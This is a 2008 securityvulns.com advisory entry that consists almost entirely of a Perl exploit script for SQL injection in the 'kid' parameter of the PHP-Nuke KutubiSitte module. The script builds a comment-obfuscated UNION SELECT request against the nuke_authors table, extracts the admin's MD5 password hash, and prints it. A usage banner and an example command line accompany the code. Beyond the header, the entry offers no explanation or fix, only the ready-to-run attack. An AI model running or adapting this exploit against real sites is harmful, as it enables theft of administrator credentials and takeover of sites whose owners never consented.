PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding

2008-03-09T00:00:00
ID SECURITYVULNS:DOC:19355
Type securityvulns
Reporter Securityvulns
Modified 2008-03-09T00:00:00

Description

!/usr/bin/perl

use Getopt::Std; use LWP::UserAgent;

sub usg{ printf("

-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- | PHP-NUKE KutubiSitte [kid] => SQL Injection | -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- ####################################################### # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 # ####################################################### <-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->

:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:

:-------------------------------------------------------:

:#| USAGE: |#: :#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#:

:-------------------------------------------------------:

:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:

:-------------------------------------------------------:

:#| EXAMPLE: |#: :#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:

:-------------------------------------------------------:

:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:

"); } sub problem{ print "\n\n[~] SITO NON VULNERABILE [~]\n\n"; exit(); } sub exploitation{

$conn = LWP::UserAgent -&gt; new;
$conn-&gt;agent&#40;&#39;Checkbot/0.4 &#39;&#41;;
$query_pwd =

$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A"; $return_pwd = $conn->get($query_pwd) || problem(); $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem(); print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n "; }

getopts(":h:p:U:",\%args); $host = $args{h} if (defined $args{h}); $path = $args{p} if (defined $args{p}); $user_id= $args{U}if (defined $args{U});

 if &#40;!defined $args{h} || !defined $args{p} || !defined $args{U}&#41;{
    usg&#40;&#41;;
 }
 else{
    exploitation&#40;&#41;;
 }